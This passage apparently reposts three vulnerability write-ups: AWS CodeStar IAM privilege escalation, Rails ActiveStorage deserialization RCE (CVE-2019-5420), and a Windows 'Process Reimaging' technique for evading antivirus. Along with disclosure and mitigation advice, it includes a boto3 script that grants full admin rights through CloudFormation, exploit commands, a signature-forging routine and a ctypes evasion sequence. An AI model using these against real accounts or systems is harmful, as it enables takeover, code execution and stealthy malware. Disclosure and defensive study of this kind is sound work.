codestar:CreateProjectFromTemplate, but there are likely many more customer-managed IAM policies out there that grant it as well. 
arn:aws:iam::aws:policy/AdministratorAccess (obviously) arn:aws:iam::aws:policy/PowerUserAccess arn:aws:iam::aws:policy/AWSCodeStarFullAccess arn:aws:iam::aws:policy/service-role/AWSCodeStarServiceRole Undocumented CodeStar API to Privilege Escalation The codestar:CreateProjectFromTemplate permission was the only permission needed to create a project from the variety of templates offered in the AWS web console. The trick here is that these templates are “managed” by AWS, so when you choose one to launch, it will use the CodeStar service role to launch the project and not your own permissions. That means that you are essentially instructing the CodeStar service role to act on your behalf, and because that service role likely has more permissions than you do, you can utilize them for malicious activity. As part of these templates, an IAM policy is created in your account named “CodeStarWorker-<project name>-Owner”, where <project name> is the name you give the CodeStar project. The CodeStar service role then attaches that policy to your user because you are the owner of that project. Just by doing that, we have already escalated our permissions, because the “CodeStarWorker-<project name>-Owner” policy grants a lot of access. Most permissions are restricted to the resources that the project created, but some are more general (like a few IAM permissions on your own user). There are also other policies and roles that get created as part of this process–some important and some not–so we’ll touch on those as we go. The above screenshot shows some of the available templates when creating a CodeStar project through the web console. Prior to AWS’s Fix When this vulnerability was originally discovered, the permissions that the “CodeStarWorker-<project name>-Owner” policy granted were slightly different than they are now. Originally, as long as the CodeStar service role existed in the account, an IAM user with only the codestar:CreateProjectFromTemplate permission could escalate their permissions to a full administrator of the AWS account. This was because one of the resources that was created was an IAM role named “CodeStarWorker-<project name>-CloudFormation” and it was used to create a CloudFormation stack to build the project that you chose. It was originally granted full access to 50+ AWS services, including a variety of IAM permissions. A few of the important IAM permissions included: iam:AttachRolePolicy iam:AttachUserPolicy iam:PutRolePolicy If you have read our blog on AWS privilege escalation, then you already know these permissions can be used to quickly escalate a user or role to a full administrator. For a copy of the old policy that was attached to the “CodeStarWorker-<project name>-CloudFormation” IAM role, visit this link. With that unrestricted access to so many services, you could almost certainly compromise most of your target’s resources in AWS, spin up cryptominers, or just delete everything. To use these permissions, we needed to gain access to the “CodeStarWorker-<project name>-CloudFormation” IAM role. This wasn’t difficult because it was already passed to a CloudFormation stack that the “CodeStarWorker-<project name>-Owner” IAM policy granted us access to. This meant we just needed to update the CloudFormation stack and pass in a template that would use the role’s permissions to do something on our behalf. 
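A sketch of what such an UpdateStack call could look like (boto3; the project, stack and role names are placeholders following the naming pattern described in this article, and the template is stripped down to the single injected resource - a real update would also need to carry the stack's existing resources):

# Hypothetical sketch of the UpdateStack step described above (names are placeholders).
# The injected AWS::IAM::Policy rides on the CodeStarWorker-<project>-CloudFormation role
# that is already passed to the stack, so the low-privileged user never needs iam:PassRole.
import json
import boto3

PROJECT = "myproject"  # placeholder CodeStar project name

template = {
    "AWSTemplateFormatVersion": "2010-09-09",
    "Resources": {
        "EscalationPolicy": {
            "Type": "AWS::IAM::Policy",
            "Properties": {
                "PolicyName": "escalation-demo",
                "PolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
                },
                # Attach the inline policy to the role the stack already uses.
                "Roles": [f"CodeStarWorker-{PROJECT}-CloudFormation"],
            },
        }
    },
}

boto3.client("cloudformation").update_stack(
    StackName=f"awscodestar-{PROJECT}-lambda",
    TemplateBody=json.dumps(template),
    Capabilities=["CAPABILITY_NAMED_IAM"],
)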
Due to CloudFormation’s limitations, this “something” needed to be an inline policy to make that same CloudFormation role an administrator, then a second UpdateStack call would need to be made to also make your original user an administrator. There were many reasons for this, but essentially it was because you couldn’t instruct CloudFormation to attach an existing managed IAM policy to an existing user. Disclosure and How AWS Fixed the Privilege Escalation We disclosed this vulnerability to AWS Security on March 19th, 2019, and worked with them to resolve the risk of this attack. Over the next few months, multiple fixes were implemented because a few bypasses were discovered the first few times. Those bypasses still allowed for full administrator privilege escalation, even after their initial fixes, but by working with them, we were able to get that resolved. By mid-May 2019, we had the go-ahead that the vulnerability had been remediated. Overall, this vulnerability was fixed by limiting the permissions granted to the “CodeStarWorker-<project name>-Owner” IAM policy and the “CodeStartWorker-<project name>-CloudFormation” IAM role. The role was restricted by requiring the use of an IAM permissions boundary in its IAM permissions, which is effective in preventing privilege escalation to a full administrator. Depending on what other resources/misconfigurations exist in the environment, it might still be possible to escalate to full admin access (through a service such as Lambda or EC2) after exploiting this method. They also introduced another fix, where the AWS web console now uses “codestar:CreateProject” and “iam:PassRole” to create projects from templates, but the “codestar:CreateProjectFromTemplate” API is still publicly accessible and enabled, so it can still be abused for privilege escalation (just to a lesser extent than before). The Attack Vector After the Fix While the AWS CodeStar team was responsive & implemented several fixes, we were still able to identify a way to use the undocumented API for privilege escalation. This wasn’t as severe as before AWS implemented their fixes, but still noteworthy. The new attack path looks like this: Use codestar:CreateProjectFromTemplate to create a new project. You will be granted access to “cloudformation:UpdateStack” on a stack that has the “CodeStarWorker-<project name>-CloudFormation” IAM role passed to it. Use the CloudFormation permissions to update the target stack with a CloudFormation template of your choice. The name of the stack that needs to be updated will be “awscodestar-<project name>-infrastructure” or “awscodestar-<project name>-lambda”, depending on what template is used (in the example exploit script, at least). At this point, you would now have full access to the permissions granted to the CloudFormation IAM role. You won’t be able to get full administrator with this alone; you’ll need other misconfigured resources in the environment to help you do that. Automation and Exploitation with Pacu This privilege escalation method has been integrated into Pacu’s “iam__privesc_scan”, so you can check what users/roles are vulnerable within your account. To check your account for privilege escalation (all 17+ methods we have blogged about, including this one) from a fresh Pacu session, you can run the following commands from the Pacu CLI: 1. import_keys default: Import the “default” profile from the AWS credentials file (~/.aws/credentials) 2. run iam__enum_users_roles_policies_groups --users: Enumerate IAM users 3. 
run iam__enum_permissions --all-users: Enumerate their permissions 4. run iam__privesc_scan --offline: Check for privilege escalation methods As you can see, two IAM users were found and had their permissions enumerated. One of them was already an administrator, and the other user, “VulnerableUser”, is vulnerable to the “CodeStarCreateProjectFromTemplate” privilege escalation method. Two Bonus Privilege Escalations Added to Pacu With this blog release and Pacu update, we also added two more checks to the “iam__privesc_scan” module, both with auto-exploitation available. The first method is “PassExistingRoleToNewCodeStarProject” which uses “codestar:CreateProject” and “iam:PassRole” to escalate an IAM user or role to a full administrator. The second method is “CodeStarCreateProjectThenAssociateTeamMember” which uses “codestar:CreateProject” and “codestar:AssociateTeamMember” to make an IAM user the owner of a new CodeStar project, which will grant them a new policy with a few extra permissions. Pacu can be found on our GitHub with the latest updates pushed, so we suggest using it to check your own environment for any of these new privilege escalations. CreateProjectFromTemplate Exploit Script This privilege escalation method did not have auto-exploitation integrated into Pacu because it is an undocumented API, and thus unsupported in the “boto3” Python library. Instead, an exploit script was derived from AWS’s guide on manually signing API requests in Python. The standalone exploitation script can be found here. The script has the option of using two different templates, one of which grants more access than the other, but it requires that you know the ID of a VPC, the ID of a subnet in that VPC, and the name of an SSH key pair in the target region. It’s possible to collect some of that information by running the exploit script without that knowledge, then using the escalated permissions to enumerate that information, then re-running the exploit script again with the data you discovered. Using the Script The only permission required to run the script is “codestar:CreateProjectFromTemplate”, but you must be a user (not a role) because of how CodeStar works. Without prior information: you can run the script like this, which will use the default AWS profile: python3 CodeStarPrivEsc.py --profile default With the EC2/VPC information: you can run the script like this: python3 CodeStarPrivEsc.py --profile default --vpc-id vpc-4f1d6h18 --subnet-id subnet-2517b823 --key-pair-name MySSHKey There should be quite a bit of output, but at this point, you will just be waiting for the CloudFormation stacks to spin up in the environment and create all the necessary resources. Right away, you’ll gain some additional privileges through the “CodeStar_<project name>_Owner” IAM policy, but if you wait, additional versions of that policy will be created as other resources in the environment are created. The script will output the AWS CLI command you need to run to view your own user’s permissions, once the privilege escalation has complete. 
That command will look something like this (pay attention though, because the version ID will change, depending on the template you are using): aws iam get-policy-version --profile default --policy-arn arn:aws:iam::ACCOUNT-ID:policy/CodeStar_PROJECTNAME_Owner --version-id v3 It might take some time for that command to execute successfully while everything gets spun up in the environment, but once it is able to execute successfully, that means the privilege escalation process is complete. Utilizing Your New Permissions You’ll now have all the permissions that the policy you just viewed grants, and as part of that, you are granted the “cloudformation:UpdateStack” permission on a CloudFormation stack that has already had the “CodeStarWorker-<project name>-CloudFormation” IAM role passed to it. That means you can use that role for what you want, without ever needing the “iam:PassRole” permission. The permissions granted to this role should be the same every time (unless they update the template behind the scenes) and you won’t have permission to view them. Without prior information: visit this link to see what the access looks like. With the EC2/VPC information: visit this link to see what the access looks like. The script will also output the command to use to update the CloudFormation stack that you want to target. That command will look like this: aws cloudformation update-stack --profile default --region us-east-1 --stack-name awscodestar-PROJECTNAME-lambda --capabilities "CAPABILITY_NAMED_IAM" --template-body file://PATH-TO-CLOUDFORMATION-TEMPLATE Without prior information: the stack’s name will be “awscodestar-<project name>-lambda” With the EC2/VPC information: the stack’s name will be “awscodestar-<project name>-infrastructure”. Just create a CloudFormation template to create/modify the resources that you want and run that UpdateStack command to take control of the CloudFormation role. Video Example The following video shows a user who is only granted the “codestar:CreateProjectFromTemplate” permission escalating their permissions with the exploit script. The video only shows part 1 of 2 of the full attack-process because the next step depends on what your goal is. After the privilege escalation shown in this video is done, the next step would be to take control of the CloudFormation IAM role and abuse its permissions. The first step of the privilege escalation grants you access to a few things, including control over that CloudFormation role. Then, because the CloudFormation role has more access than you do, you can instruct it to perform an action on your behalf, whatever that may be. Note that around the 1 minute mark we cut out a few minutes of refreshing the browser. It takes time for the resources to deploy and the privilege escalation is not complete until all of them deploy, so there is a bit of waiting required. Defending Against Privilege Escalation through CodeStar There are a few key points to defending against this privilege escalation method in an AWS environment. If you don’t use CodeStar in your environment, ensure that the CodeStar IAM service role is removed from or never created in your account (the default name is “aws-codestar-service-role”). Implement the principle of least-privilege when granting access to your environment. This entails avoiding the use of wildcards in IAM policies where possible so that you can be 100% sure what APIs you are granting your users access to. Do not grant CodeStar permissions to your users unless they require it. 
Be careful granting CodeStar permissions through wildcards when they do require it, so that users aren’t granted the “codestar:CreateProjectFromTemplate” permission. If a user must be granted “codestar:CreateProject” and “iam:PassRole” (and/or “codestar:AssociateTeamMember”), be sure that sufficient monitoring is in place to detect any privilege escalation attempts. Conclusion The CodeStar undocumented API vulnerability has for the most part been fixed, but it is still a good idea to implement the defense strategies outlined above. This type of vulnerability might not only be limited to CodeStar, though, because there might be other undocumented APIs for other AWS services that are abusable like this one. Many undocumented APIs were discovered in just the short amount of time it took to find this vulnerability. Sometimes these undocumented APIs can be beneficial for attackers, while some might be useless. Either way, it is always useful as an attacker to dig deep and figure out what APIs exist and which ones are abusable. As a defender, it is necessary to keep up with the attackers to defend against unexpected and unknown attack vectors. Following best practice, like not using wildcards when giving permissions, is also a great way to avoid this vulnerability. We’ll be at re:Inforce next week, with two more big releases coming before the event. We’ll also be teaming up with Protego and handing out copies of our AWS pentesting book to the first 50 people each day of the event. Sursa: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/
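Before moving on, here is a minimal, hypothetical boto3 sketch of the UpdateStack step described in the attack path above. The profile, stack name and user name are placeholders, and the single-resource template only illustrates the "attach an inline admin policy to your original user" idea from the write-up; a real update would have to be merged into the stack's existing template rather than replace it.

import json
import boto3

PROFILE = "default"                       # placeholder: profile holding the compromised keys
STACK = "awscodestar-PROJECTNAME-lambda"  # placeholder: stack created via the CodeStar project
TARGET_USER = "VulnerableUser"            # placeholder: the low-privileged IAM user

# A single-resource template that attaches an inline "allow everything" policy to
# the target user. Illustrative only.
template = {
    "AWSTemplateFormatVersion": "2010-09-09",
    "Resources": {
        "EscalationPolicy": {
            "Type": "AWS::IAM::Policy",
            "Properties": {
                "PolicyName": "escalation-policy",
                "Users": [TARGET_USER],
                "PolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
                },
            },
        }
    },
}

cfn = boto3.Session(profile_name=PROFILE).client("cloudformation")
cfn.update_stack(
    StackName=STACK,
    TemplateBody=json.dumps(template),
    Capabilities=["CAPABILITY_NAMED_IAM"],
)

Because the stack already has the CloudFormation role passed to it, that role (not the caller) performs the IAM change, which is why iam:PassRole is never needed by the attacker.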
13. Remote Code Execution via Ruby on Rails Active Storage Insecure Deserialization

June 20, 2019 | Guest Blogger

In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Sivathmican Sivakumaran and Pengsu Cheng of the Trend Micro Security Research Team detail a recent code execution vulnerability in Ruby on Rails. The bug was originally discovered and reported by the researcher known as ooooooo_q. The following is a portion of their write-up covering CVE-2019-5420, with a few minimal modifications.

An insecure deserialization vulnerability has been reported in the ActiveStorage component of Ruby on Rails. This vulnerability is due to deserializing a Ruby object embedded within an HTTP URL using Marshal.load() without sufficient validation.

The Vulnerability

Rails is an open source web application Model View Controller (MVC) framework written in the Ruby language. Rails is built to encourage software engineering patterns and paradigms such as convention over configuration (CoC), don't repeat yourself (DRY), and the active record pattern. Rails ships as a set of individual components. Rails 5.2 also ships with Active Storage, which is the component of interest for this vulnerability. Active Storage is used to store files and associate those files to Active Record. It is compatible with cloud storage services such as Amazon S3, Google Cloud Storage, and Microsoft Azure Storage.

Ruby supports serialization of objects to JSON, YAML or the Marshal serialization format. The Marshal serialization format is implemented by the Marshal class. Objects can be serialized and deserialized via the dump() and load() methods, respectively. The Marshal serialization format uses a type-length-value representation to serialize objects.

Active Storage adds a few routes by default to the Rails application. Of interest to this report are the two routes responsible for downloading and uploading files, respectively.

An insecure deserialization vulnerability exists in the ActiveStorage component of Ruby on Rails. This component uses ActiveSupport::MessageVerifier to ensure the integrity of the above :encoded_key and :encoded_token variables. In normal use, these variables are generated by MessageVerifier.generate(), and their structure is a base64-encoded message followed by an HMAC digest of that message. <base64-message> contains a base64 encoded JSON object.

When a GET or PUT request is sent to a URI that contains "/rails/active_storage/disk/", the :encoded_key and :encoded_token variables are extracted. These variables are expected to be generated by MessageVerifier.generate(), hence decode_verified_key and decode_verified_token call MessageVerifier.verified() to check the integrity of these values and deserialize them. Integrity is checked by calling ActiveSupport::SecurityUtils.secure_compare(digest, generate_digest(data)). The digest is generated by signing the data with a MessageVerifier secret. For Rails applications in development, this secret is always the application name, which is publicly known. For Rails applications in production, the secret is stored in a credentials.yml.enc file, which is encrypted using a key in the master.key file. The contents of these files can be disclosed using CVE-2019-5418. Once the integrity check passes, the message is base64 decoded and Marshal.load() is called on the resulting byte stream without any further validation.
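To make the signing scheme concrete, here is a small Python sketch of the "data--digest" layout that the verifier checks. It is an illustration under assumptions (the default HMAC-SHA1 digest and a secret that has already been derived for this particular verifier, for example from a known development secret_key_base); it is not code from the vendor write-up.

import base64
import hashlib
import hmac

def sign_message(serialized: bytes, secret: bytes) -> str:
    # Mirror the "base64(data)--hexdigest" layout MessageVerifier checks.
    # Assumption: default HMAC-SHA1 digest and an already-derived secret.
    data = base64.b64encode(serialized).decode()
    digest = hmac.new(secret, data.encode(), hashlib.sha1).hexdigest()
    return f"{data}--{digest}"

# A real exploit would sign a malicious Marshal-serialized object; here we just
# sign a placeholder byte string to show the format.
print(sign_message(b"\x04\x08placeholder", b"derived-secret"))

An attacker who knows (or can derive) the secret can therefore produce values that pass the secure_compare() check and reach Marshal.load() with arbitrary bytes.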
An attacker can exploit this condition by embedding a dangerous object, such as ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy, to achieve remote code execution. CVE-2019-5418 needs to be chained to CVE-2019-5420 to ensure all conditions are met to achieve code execution. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request embedding malicious serialized objects to a vulnerable application. Successful exploitation would result in arbitrary code execution under the security context of the affected Ruby on Rails application. Source Code Walkthrough The following code snippet was taken from Rails version 5.2.1. Comments added by Trend Micro have been highlighted. From activesupport/lib/active_support/message_verifier.rb: From activestorage/app/controllers/active_storage/disk_controller.rb: The Exploit There is a publicly available Metasploit module demonstrating this vulnerability. The following stand-alone Python code may also be used. The usage is simply: python poc.py <host> [<port>] Please note our Python PoC assumes that the application name is "Demo::Application". The Patch This vulnerability received a patch from the vendor in March 2019. In addition to this bug, the patch also provides fixes for CVE-2019-5418, a file content disclosure bug, and CVE-2019-5419, a denial-of-service bug in Action View. If you are not able to immediately apply the patch, this issue can be mitigated by specifying a secret key in development mode. In config/environments/development.rb file, add the following: config.secret_key_base = SecureRandom.hex(64) The only other salient mitigation is to restrict access to the affected ports. Conclusion This bug exists in versions 6.0.0.X and 5.2.X of Rails. Given that this vulnerability received a CVSS v3 score of 9.8, users of Rails should definitely look to upgrade or apply the mitigations soon. Special thanks to Sivathmican Sivakumaran and Pengsu Cheng of the Trend Micro Security Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Security Research services please visit http://go.trendmicro.com/tis/. The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the ZDI team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization
14. In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass

By Eoin Carroll, Cedric Cochin, Steve Povolny and Steve Hearnden on Jun 20, 2019

Process Reimaging Overview

The Windows Operating System has inconsistencies in how it determines process image FILE_OBJECT locations, which impacts the ability of non-EDR (Endpoint Detection and Response) Endpoint Security Solutions (such as Microsoft Defender Realtime Protection) to detect the correct binaries loaded in malicious processes. This inconsistency has led McAfee's Advanced Threat Research to develop a new post-exploitation evasion technique we call "Process Reimaging". This technique is equivalent in impact to Process Hollowing or Process Doppelganging within the Mitre ATT&CK Defense Evasion category; however, it is much easier to execute as it requires no code injection. While this bypass has been successfully tested against current versions of Microsoft Windows and Defender, it is highly likely that the bypass will work on any endpoint security vendor or product implementing the APIs discussed below.

The Windows Kernel, ntoskrnl.exe, exposes functionality through NTDLL.dll APIs to support user-mode components such as Endpoint Security Solution (ESS) services and processes. One such API is K32GetProcessImageFileName, which allows ESSs to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure. The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. We have developed a proof-of-concept which exploits this FILE_OBJECT location inconsistency by hiding the physical location of a process EXE. The PoC allowed us to persist a malicious process (post exploitation) which does not get detected by Windows Defender. The Process Reimaging technique cannot be detected by Windows Defender until it has a signature for the malicious file and either blocks it on disk before process creation or performs a full scan on the suspect machine post-compromise to detect the file on disk.

In addition to Process Reimaging weaponization and protection recommendations, this blog includes a technical deep dive on reversing the Windows Kernel APIs for process attribute verification and the Process Reimaging attack vectors. We use the SynAck ransomware as a case study to illustrate Process Reimaging's impact relative to Process Hollowing and Doppelganging; this illustration does not relate to Windows Defender's ability to detect Process Hollowing or Doppelganging, but to the subverting of trust for process attribute verification.

Antivirus Scanner Detection Points

When an Antivirus scanner is active on a system, it will protect against infection by detecting running code which contains malicious content, and by detecting a malicious file at write time or load time. The actual sequence for loading an image is as follows:

1. FileCreate – the file is opened to be able to be mapped into memory.
2. Section Create – the file is mapped into memory.
3. Cleanup – the file handle is closed, leaving a kernel object which is used for PAGING_IO.
4. ImageLoad – the file is loaded.
5. CloseFile – the file is closed.

If the Antivirus scanner is active at the point of load, it can use any one of the above steps (1, 2 and 4) to protect the operating system against malicious code.
If the virus scanner is not active when the image is loaded, or it does not contain definitions for the loaded file, it can query the operating system for information about which files make up the process and scan those files. Process Reimaging is a mechanism which circumvents virus scanning at step 4, or when the virus scanner either misses the launch of a process or has inadequate virus definitions at the point of loading. There is currently no documented method to securely identify the underlying file associated with a running process on Windows. This is due to Windows' inability to retrieve the correct image filepath from the NTDLL APIs.

This can be shown to evade Defender (MsMpEng.exe/MpEngine.dll) where the file being executed is a "Potentially Unwanted Program" such as mimikatz.exe. If Defender is enabled during the launch of mimikatz, it detects at phase 1 or 2 correctly. If Defender is not enabled, or if the launched program is not recognized by its current signature files, then the file is allowed to launch. Once Defender is enabled, or the signatures are updated to include detection, then Defender uses K32GetProcessImageFileName to identify the underlying file. If the process has been created using our Process Reimaging technique, then the running malware is no longer detected. Therefore, any security service auditing running programs will fail to identify the files associated with the running process.

Subverting Trust

The Mitre ATT&CK model specifies post-exploitation tactics and techniques used by adversaries, based on real-world observations for Windows, Linux and macOS endpoints, per figure 1 below.

Figure 1 – Mitre Enterprise ATT&CK

Once an adversary gains code execution on an endpoint, before lateral movement, they will seek to gain persistence, privilege escalation and defense evasion capabilities. They can achieve defense evasion using process manipulation techniques to get code executing in a trusted process. Process manipulation techniques have existed for a long time and evolved from Process Injection to Hollowing and Doppelganging, with the objective of impersonating trusted processes. There are other process manipulation techniques as documented by Mitre ATT&CK and the Unprotect Project, but we will focus on Process Hollowing and Process Doppelganging. Process manipulation techniques exploit legitimate features of the Windows Operating System to impersonate trusted process executable binaries and generally require code injection.

ESSs place inherent trust in the Windows Operating System for capabilities such as digital signature validation and process attribute verification. As demonstrated by Specter Ops, ESSs' trust in the Windows Operating System could be subverted for digital signature validation. Similarly, Process Reimaging subverts an ESS's trust in the Windows Operating System for process attribute verification. When a process is trusted by an ESS, it is perceived to contain no malicious code and may also be trusted to call into the ESS trusted infrastructure.

McAfee ATR uses the Mitre ATT&CK framework to map adversarial techniques, such as defense evasion, with associated campaigns. This insight helps organizations understand adversaries' behavior and evolution so that they can assess their security posture and respond appropriately to contain and eradicate attacks. McAfee ATR creates and shares Yara rules based on threat analysis to be consumed for protect and detect capabilities.
Process Manipulation Techniques (SynAck Ransomware)

McAfee Advanced Threat Research analyzed SynAck ransomware in 2018 and discovered it used Process Doppelganging, with Process Hollowing as its fallback defense evasion technique. We use this malware to explain the Process Hollowing and Process Doppelganging techniques, so that they can be compared to Process Reimaging based on a real-world observation.

Process manipulation defense evasion techniques continue to evolve. Process Doppelganging was publicly announced in 2017, requiring advancements in ESSs for protection and detection capabilities. Because process manipulation techniques generally exploit legitimate features of the Windows Operating System, they can be difficult to defend against if the Antivirus scanner does not block prior to process launch.

Process Hollowing

"Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis" (see figure 2 below)

Figure 2 – SynAck Ransomware Defense Evasion with Process Hollowing

Process Doppelganging

"Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of Windows Transactional NTFS (TxF) also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext" (see figure 3 below)

Figure 3 – SynAck Ransomware Defense Evasion with Doppelganging

Process Reimaging Weaponization

The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths which enable an adversary to bypass Windows operating system process attribute verification. This allows an adversary to persist a malicious process (post exploitation) by hiding the physical location of a process EXE (see figure 4 below).

Figure 4 – SynAck Ransomware Defense Evasion with Process Reimaging

Process Reimaging Technical Deep Dive

NtQueryInformationProcess retrieves all process information from EPROCESS structure fields in the kernel, and NtQueryVirtualMemory retrieves information from the Virtual Address Descriptors (VADs) field in the EPROCESS structure. The EPROCESS structure contains filename and path information at the following fields/offsets (see figure 5 below):

+0x3b8 SectionObject (filename and path)
+0x448 ImageFilePointer* (filename and path)
+0x450 ImageFileName (filename)
+0x468 SeAuditProcessCreationInfo (filename and path)
* this field is only present in Windows 10

Figure 5 – Code Complexity IDA Graph Displaying NtQueryInformationProcess Filename APIs within NTDLL

Kernel API NtQueryInformationProcess is consumed by the following kernelbase/NTDLL APIs:

K32GetModuleFileNameEx
K32GetProcessImageFileName
QueryFullProcessImageName

The VADs hold a pointer to the FILE_OBJECT for all mapped images in the process, which contains the filename and filepath (see figure 6 below). Kernel API NtQueryVirtualMemory is consumed by the following kernelbase/NTDLL API:

GetMappedFileName

Figure 6 – Code Complexity IDA Graph Displaying NtQueryVirtualMemory Filename API within NTDLL

Windows fails to update any of the above kernel structure fields when a FILE_OBJECT filepath is modified post-process creation. Windows does update FILE_OBJECT filename changes for some of the above fields.
The VADs reflect any filename change for a loaded image after process creation, but they don't reflect any rename of the filepath. The EPROCESS fields also fail to reflect any renaming of the process filepath, and only the ImageFilePointer field reflects a filename change. As a result, the APIs exported by NtQueryInformationProcess and NtQueryVirtualMemory return incorrect process image file information when called by ESSs or other applications (see Table 1 below).

Table 1 – OS/Kernel version and API Matrix

Prerequisites for all Attack Vectors

Process Reimaging targets the post-exploitation phase, whereby a threat actor has already gained access to the target system. This is the same prerequisite as the Process Hollowing or Doppelganging techniques within the Defense Evasion category of the Mitre ATT&CK framework.

Process Reimaging Attack Vectors

FILE_OBJECT Filepath Changes

Simply renaming the filepath of an executing process results in the Windows OS returning the incorrect image location information for all APIs (see figure 7 below). This impacts all Windows OS versions at the time of testing.

Figure 7 – FILE_OBJECT Filepath Changes – Filepath Changes Impact all Windows OS versions

FILE_OBJECT Filename Changes

Filename Change >= Windows 10

Simply renaming the filename of an executing process results in the Windows OS returning the incorrect image information for the K32GetProcessImageFileName API (see figure 8.1.1 below). This has been confirmed to impact Windows 10 only.

Figure 8.1.1 – FILE_OBJECT Filename Changes – Filename Changes impact Windows >= Windows 10

Per figure 8.1.2 below, GetModuleFileNameEx and QueryFullProcessImageName will get the correct filename changes due to a new EPROCESS field, ImageFilePointer, at offset 448. The instruction there (mov r12, [rbx+448h]) references the ImageFilePointer at offset 448 into the EPROCESS structure.

Figure 8.1.2 – NtQueryInformationProcess (Windows 10) – Windows 10 RS1 x64 ntoskrnl version 10.0.14393.0

Filename Change < Windows 10

Simply renaming the filename of an executing process results in the Windows OS returning the incorrect image information for the K32GetProcessImageFileName, GetModuleFileNameEx and QueryFullProcessImageName APIs (see figure 8.2.1 below). This has been confirmed to impact Windows 7 and Windows 8.

Figure 8.2.1 – FILE_OBJECT Filename Changes – Filename Changes Impact Windows < Windows 10

Per figure 8.2.2 below, GetModuleFileNameEx and QueryFullProcessImageName will get the incorrect filename (PsReferenceProcessFilePointer references EPROCESS offset 0x3b8, SectionObject).

Figure 8.2.2 – NtQueryInformationProcess (Windows 7 and 8) – Windows 7 SP1 x64 ntoskrnl version 6.1.7601.17514

LoadLibrary FILE_OBJECT Reuse

LoadLibrary FILE_OBJECT reuse leverages the fact that when LoadLibrary or CreateProcess is called after a LoadLibrary and FreeLibrary on an EXE or DLL, the process reuses the existing image FILE_OBJECT in memory from the prior LoadLibrary. The exact sequence is:

1. LoadLibrary (path\filename)
2. FreeLibrary (path\filename)
3. LoadLibrary (renamed path\filename) or CreateProcess (renamed path\filename)

This results in Windows creating a VAD entry in the process at step 3 above, which reuses the same FILE_OBJECT still in process memory, created at step 1 above. The VAD now has incorrect filepath information for the file on disk, and therefore the GetMappedFileName API will return the incorrect location on disk for the image in question.
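The following is a hypothetical Python/ctypes sketch (Windows only) of that exact sequence; the DLL name and directories are placeholders, and it is only meant to make the reuse pattern concrete rather than to serve as a working bypass.

import ctypes
import os
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.LoadLibraryW.argtypes = (wintypes.LPCWSTR,)
kernel32.LoadLibraryW.restype = wintypes.HMODULE
kernel32.FreeLibrary.argtypes = (wintypes.HMODULE,)
kernel32.GetCurrentProcess.restype = wintypes.HANDLE
kernel32.K32GetMappedFileNameW.argtypes = (
    wintypes.HANDLE, wintypes.LPVOID, wintypes.LPWSTR, wintypes.DWORD)

# Placeholder paths: any DLL you control works for the experiment.
orig_dir, renamed_dir, dll = r"C:\temp\payload", r"C:\temp\renamed", "test.dll"

# 1. LoadLibrary on the original path, 2. FreeLibrary it (the image FILE_OBJECT
#    stays cached in the process).
handle = kernel32.LoadLibraryW(os.path.join(orig_dir, dll))
kernel32.FreeLibrary(handle)

# Rename the directory portion of the path, then 3. LoadLibrary the renamed path.
os.rename(orig_dir, renamed_dir)
handle = kernel32.LoadLibraryW(os.path.join(renamed_dir, dll))

# Ask GetMappedFileName where the mapped image lives; per the write-up, the reused
# FILE_OBJECT means the reported (device-form) path can still be the pre-rename one.
buf = ctypes.create_unicode_buffer(260)
kernel32.K32GetMappedFileNameW(kernel32.GetCurrentProcess(), handle, buf, len(buf))
print("GetMappedFileName reports:", buf.value)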
The following prerequisites are required to evade detection successfully:

- The LoadLibrary or CreateProcess must use the exact same file on disk as the initial LoadLibrary.
- The filepath must be renamed (dropping the same file into a newly created path will not work).

The Process Reimaging technique can be used in two ways with the LoadLibrary FILE_OBJECT reuse attack vector:

1. LoadLibrary (see figure 9 below)

When an ESS or application calls the GetMappedFileName API to retrieve a memory-mapped image file, Process Reimaging will cause the Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Figure 9 – LoadLibrary FILE_OBJECT Reuse (LoadLibrary) – Process Reimaging Technique Using LoadLibrary Impacts all Windows OS Versions

2. CreateProcess (see figure 10 below)

When an ESS or application calls the GetMappedFileName API to retrieve the process image file, Process Reimaging will cause the Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Figure 10 – LoadLibrary FILE_OBJECT Reuse (CreateProcess) – Process Reimaging Technique using CreateProcess Impacts all Windows OS Versions

Process Manipulation Techniques Comparison

Windows Defender Process Reimaging Filepath Bypass Demo

This video simulates a zero-day malware being dropped (Mimikatz PUP sample) to disk and executed as the malicious process "phase1.exe". Using the Process Reimaging Filepath attack vector, we demonstrate that even if Defender is updated with a signature for the malware on disk, it will not detect the running malicious process. Therefore, for non-EDR ESSs such as Defender Real-time Protection (used by Consumers and also Enterprises), the malicious process can dwell on a Windows machine until a reboot or until the machine receives a full scan post signature update.

CVSS and Protection Recommendations

CVSS

If a product uses any of the APIs listed in Table 1 for the following use cases, then it is likely vulnerable:

- Process reputation of a remote process – any product using the APIs to determine if executing code is from a malicious file on disk. CVSS score 5.0 (Medium): https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N (same score as Doppelganging)
